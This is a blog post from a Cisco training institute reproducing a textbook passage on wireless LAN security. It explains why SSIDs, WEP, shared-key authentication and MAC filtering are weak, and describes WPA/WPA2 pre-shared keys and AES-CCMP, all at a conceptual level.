Network Bulls
www.networkbulls.com
Best Institute for CCNA CCNP CCSP CCIP CCIE Training in India
M-44, Old Dlf, Sector-14 Gurgaon, Haryana, India
Call: +91-9654672192
By default, wireless security is nonexistent on access points and clients. The original 802.11
committee just didn’t imagine that wireless hosts would one day outnumber bounded media
hosts, but that’s truly where we’re headed. Also, and unfortunately, just as with the IPv4
routed protocol, engineers and scientists didn’t add security standards that are robust enough
to work in a corporate environment. So we’re left with proprietary solution add-ons to aid us
in our quest to create a secure wireless network. And no—I’m not just sitting here bashing the
standards committees. The security problems we’re experiencing were also created by the U.S.
government because of export issues with its own security standards. Our world is a complicated
place, so it follows that our security solutions are going to be as well.
A good place to start is by discussing the standard basic security that was added into the
original 802.11 standards and why those standards are way too flimsy and incomplete to
enable us to create a secure wireless network relevant to today’s challenges.
Open Access
All Wi-Fi Certified wireless LAN products are shipped in "open-access" mode, with their security
features turned off. While open access or no security may be appropriate and acceptable
for public hot spots such as coffee shops, college campuses, and maybe airports, it’s definitely
not an option for an enterprise organization, and likely not even adequate for your private
home network.
Security needs to be enabled on wireless devices during their installation in enterprise
environments. It may come as quite a shock, but some companies actually don’t enable any
WLAN security features. Obviously, the companies that do this are exposing their networks
to tremendous risk!
The reason that the products are shipped with open access is so that any person who
knows absolutely nothing about computers can just buy an access point, plug it into their
cable or DSL modem, and voilĂ —they’re up and running. It’s marketing, plain and simple,
and simplicity sells.
SSIDs, WEP, and MAC Address Authentication
What the original designers of 802.11 did to create basic security was include the use of Service
Set Identifiers (SSIDs), open or shared-key authentication, static Wired Equivalency Protocol
(WEP), and optional Media Access Control (MAC) authentication. Sounds like a lot, but none
of these really offer any type of serious security solution—all they may be close to adequate for
is use on a common home network. But we’ll go over them anyway…
SSID is a common network name for the devices in a WLAN system that create the wireless
LAN. An SSID prevents access by any client device that doesn’t have the SSID. The thing is, by
default, an access point broadcasts its SSID in its beacon many times a second. And even if SSID
broadcasting is turned off, a bad guy can discover the SSID by monitoring the network and just
Wireless Security
475
waiting for a client response to the access point. Why? Because, believe it or not, that information,
as regulated in the original 802.11 specifications, must be sent in the clear—how secure!
If an AP does have SSID broadcasting disabled, the client needs to set the
SSID value of the AP on the client software in order to connect to the AP.
Two types of authentication were specified by the IEEE 802.11 committee: open authentication
and shared-key authentication. Open authentication involves little more than supplying
the correct SSID—but it’s the most common method in use today. With shared-key authentication,
the access point sends the client device a challenge-text packet that the client must then
encrypt with the correct Wired Equivalency Protocol (WEP) key and return to the access point.
Without the correct key, authentication fails and the client won’t be allowed to associate with
the access point. But shared-key authentication is still not considered secure because all an
intruder has to do to get around this is detect both the clear-text challenge and the same challenge
encrypted with a WEP key and then decipher the WEP key. Surprise—shared key isn’t
used in today’s WLANs because of clear-text challenge.
With open authentication, even if a client can complete authentication and associate with an
access point, the use of WEP prevents the client from sending and receiving data from the access
point unless the client has the correct WEP key. A WEP key is composed of either 40 bits or
128 bits. In its basic form, the key is usually statically defined by the network administrator on the
access point and all clients that communicate with that access point. When static WEP keys are
used, a network administrator must perform the time-consuming task of entering the same keys on
every device in the WLAN. Obviously, we now have fixes for this because this would be administratively
impossible in today’s huge corporate wireless networks!
Last, client MAC addresses can be statically typed into each access point, and any of them
that show up without that MAC addresses in the filter table would be denied access. Sounds
good, but of course all MAC layer information must be sent in the clear—anyone equipped
with a free wireless sniffer can just read the client packets sent to the access point and spoof
their MAC address.
WEP can actually work if administered correctly. But basic static WEP keys are no longer
a viable option in today’s corporate networks without some of the proprietary fixes that run
on top of it. So let’s talk about some of these now.
WPA or WPA 2 Pre-Shared Key
Okay, now we’re getting somewhere. Although this is another form of basic security that’s
really just an add-on to the specifications, WPA or WPA2 Pre-Shared Key (PSK) is a better
form of wireless security than any other basic wireless security method mentioned so far.
I did say basic.
Wi-Fi Protected Access
(WPA) is a standard developed in 2003 by the Wi-Fi Alliance,
formerly known as WECA. WPA provides a standard for authentication and encryption of
WLANs that’s intended to solve known security problems. The standard takes into account
476
Chapter 8
Wireless Technologies
the well-publicized AirSnort and man-in-the-middle WLAN attacks. Of course, now we’ll use
WPA2 to help us with today’s security issues.
The PSK verifies users via a password or identifying code (also called a passphrase) on both
the client machine and the access point. A client only gains access to the network if its password
matches the access point's password. The PSK also provides keying material that TKIP
or AES uses to generate an encryption key for each packet of transmitted data. While more
secure than static WEP, PSK still has a lot in common with static WEP in that the PSK is stored
on the client station and can be compromised if the client station is lost or stolen even though
finding this key isn’t all that easy to do. It’s a definite recommendation to use a strong PSK
passphrase that includes a mixture of letters, numbers, and nonalphanumeric characters.
However, it is possible to specify with WPA the use of dynamic encryption keys that change
each time a client establishes a connection.
The benefit of WPA over static WEP key is that WPA can change dynamically
while the system is used.
WPA is a step toward the IEEE 802.11i standard and uses many of the same components,
with the exception of encryption—802.11i (WPA2) uses AES-CCMP encryption.
The IEEE 802.11i standard replaced Wired Equivalent Privacy (WEP) with a specific mode
of the Advanced Encryption Standard (AES) known as the
C
ounter Mode
C
ipher Block
Chaining-Message Authentication Code (CBC-MAC) Protocol (CCMP). This allows
AES-CCMP to provide both data confidentiality (encryption) and data integrity.
WPA’s mechanisms are designed to be implementable by current hardware vendors, meaning
that users should be able to implement WPA on their systems with only a firmware/software
modification.
No comments:
Post a Comment